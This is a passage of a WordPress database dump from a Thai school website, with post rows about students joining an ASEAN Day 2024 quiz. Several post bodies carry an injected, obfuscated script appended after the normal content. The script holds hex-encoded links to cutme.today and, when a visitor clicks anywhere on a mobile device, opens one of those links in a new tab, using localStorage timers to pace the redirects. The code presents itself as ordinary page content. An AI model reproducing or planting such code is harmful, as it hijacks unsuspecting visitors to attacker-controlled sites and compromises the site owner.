_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ASEAN DAY 2024 นางสาวสริตา เข็มทอง ตำแหน่ง ครู วิทยฐานะ ครูชำนาญการ ได้นำนักเรียนระดับชั้นมัธยมศึกษาปีที่ 3 จำนวน 2 คน คือ เด็กหญิงเข็มทอง จำปาใด และ เด็กหญิงณัชชา กั้วจำนงค์ เข้าร่วมกิจกรรมวันอาเซียน (ASEAN Day) ร่วมการแข่งขันตอบปัญหาอาเซียน (ASEAN Quiz) ระหว่างวันที่ 6-8 สิงหาคม 2567 ณ กรุงเทพมหานคร จัดโดย กรมอาเซียน กระทรวงการต่างประเทศ โดยมีวัตถุประสงค์เพื่อสร้างองค์ความรู้เกี่ยวกับอาเซียน เสริมสร้างความสัมพันธ์และเครือข่ายระหว่างกรมอาเซียน โรงเรียน และนักเรียนมากยิ่งขึ้นASEAN DAY 2024','','inherit','closed','closed','','349-revision-v1','','','2024-09-03 11:55:26','2024-09-03 04:55:26','',349,'http://watprato.ssk.in.th/?p=355',0,'revision','',0),
(356,2,'2024-09-03 11:56:08','2024-09-03 04:56:08','','457726437_122174879864202781_4352571805851092151_n','','inherit','open','closed','','457726437_122174879864202781_4352571805851092151_n','','','2024-09-03 11:56:08','2024-09-03 04:56:08','',349,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/457726437_122174879864202781_4352571805851092151_n.jpg',0,'attachment','image/jpeg',0),
(357,2,'2024-09-03 11:56:12','2024-09-03 04:56:12','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3f4dca20\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"11da9cf6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":350,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457381847_122174879558202781_6672815312348190309_n-724x1024.jpg\" alt=\"\" class=\"wp-image-350\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"590c0b46\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":351,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457791533_122174879846202781_8796933381137744998_n-1024x727.jpg\" alt=\"\" class=\"wp-image-351\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":356,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457726437_122174879864202781_4352571805851092151_n-1024x727.jpg\" alt=\"\" class=\"wp-image-356\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ASEAN DAY 2024 นางสาวสริตา เข็มทอง ตำแหน่ง ครู วิทยฐานะ ครูชำนาญการ ได้นำนักเรียนระดับชั้นมัธยมศึกษาปีที่ 3 จำนวน 2 คน คือ เด็กหญิงเข็มทอง จำปาใด และ เด็กหญิงณัชชา กั้วจำนงค์ เข้าร่วมกิจกรรมวันอาเซียน (ASEAN Day) ร่วมการแข่งขันตอบปัญหาอาเซียน (ASEAN Quiz) ระหว่างวันที่ 6-8 สิงหาคม 2567 ณ กรุงเทพมหานคร จัดโดย กรมอาเซียน กระทรวงการต่างประเทศ โดยมีวัตถุประสงค์เพื่อสร้างองค์ความรู้เกี่ยวกับอาเซียน เสริมสร้างความสัมพันธ์และเครือข่ายระหว่างกรมอาเซียน โรงเรียน และนักเรียนมากยิ่งขึ้นASEAN DAY 2024','','inherit','closed','closed','','349-revision-v1','','','2024-09-03 11:56:12','2024-09-03 04:56:12','',349,'http://watprato.ssk.in.th/?p=357',0,'revision','',0),
(358,2,'2024-09-03 11:59:41','2024-09-03 04:59:41','<!-- wp:image {\"id\":359,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/457381847_122174879558202781_6672815312348190309_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-359\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 